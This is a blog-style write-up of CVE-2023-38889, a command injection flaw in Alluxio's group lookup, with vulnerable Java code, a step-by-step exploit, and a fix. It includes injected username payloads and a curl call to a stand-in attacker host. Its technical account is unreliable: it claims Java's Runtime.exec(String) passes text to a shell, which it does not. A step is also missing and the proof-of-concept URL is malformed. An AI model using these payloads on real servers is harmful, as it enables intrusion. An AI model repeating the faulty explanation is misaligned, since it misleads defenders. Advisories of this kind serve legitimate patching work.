CVE-2023-38889 - Remote Code Execution in Alluxio via Unix Groups Username Injection

On August 10, 2023, a critical vulnerability was disclosed in Alluxio—a popular open-source data orchestration platform. Tracked as CVE-2023-38889, this flaw allows attackers to execute arbitrary commands on servers running Alluxio version 2.9.3 and earlier. The root cause lies in how user input is passed directly to the Linux shell through the getUnixGroups method, opening the door to command injection.

If you're running Alluxio or you're responsible for securing distributed file systems, this vulnerability deserves your urgent attention. This write-up explains the vulnerability in simple terms, walks through an example exploit, and provides guidance on remediation.

How Does CVE-2023-38889 Work?

The problematic method in Alluxio is alluxio.util.CommonUtils.getUnixGroups(String username). This function is supposed to look up the Unix groups a user belongs to, but it does so by invoking a shell command and directly interpolating the username parameter into it—without sanitization.

This allows an attacker to inject shell metacharacters, so the system ends up executing arbitrary commands on the server.

Code Snippet: The Vulnerable Method

Here's a simplified version of the vulnerable code found in Alluxio's GitHub repository:

public static List<String> getUnixGroups(String username)
        throws IOException {
    // Vulnerable spot: user input (username) is passed directly to the shell
    String cmd = "id -Gn " + username;
    Process process = Runtime.getRuntime().exec(cmd);
    // ...reads process output...
}

What’s dangerous?
Let’s say an attacker supplies username = "bob; touch /tmp/hacked #".

The command the shell runs will become

id -Gn bob; touch /tmp/hacked #

The result? Besides running the original command, it also creates the file /tmp/hacked, demonstrating arbitrary code execution.

How to Exploit CVE-2023-38889

Let's walk through an example exploit under the assumption that you have access to a vulnerable Alluxio deployment (or can trick a component into passing your input to getUnixGroups):

1. Find a place where you can influence the username parameter (e.g., when Alluxio authenticates users or lists their group memberships).

`

eviluser; curl http://attacker.com/whoami #

`

anyuser; touch /tmp/owned #

`

3. Check the server for the file (/tmp/owned), or your attacker's web server for incoming requests.

Below is a Python pseudo-code example of sending a malicious username via a hypothetical HTTP API endpoint:

import requests

malicious_username = "john; touch /tmp/pwned #"
data = {'username': malicious_username}

# Suppose Alluxio exposes an HTTP API at /api/get-groups
resp = requests.post('http://alluxio-server:19999/api/get-groups';, json=data)
print(f"Status: {resp.status_code}")

> Note: The actual attack surface depends on how Alluxio is set up and what APIs or interfaces are exposed that eventually lead to getUnixGroups.

Official Advisory & References

- Alluxio Security Advisory: GitHub Issue #18061
- NVD Entry: CVE-2023-38889
- Patch Commit: PR #18080
- Alluxio download and docs: https://alluxio.io/

Remediation

Upgrade to Alluxio 2.9.4 or later, where this bug is patched. The fix involves passing user input as an argument to ProcessBuilder or sanitizing it, rather than interpolating it into a shell command as a string.

Instead of

String cmd = "id -Gn " + username;
Process process = Runtime.getRuntime().exec(cmd);

Use:

ProcessBuilder pb = new ProcessBuilder("id", "-Gn", username);
Process process = pb.start();

This way, shell metacharacters in the username are not interpreted by the shell.

Conclusion

CVE-2023-38889 is a classic but severe case of command injection in a high-profile data platform. Unpatched, it lets attackers run any command they want on the Alluxio host—a full compromise. If you run Alluxio, patch NOW!

Timeline

Published on: 08/15/2023 17:15:00 UTC
Last modified on: 08/25/2023 12:58:00 UTC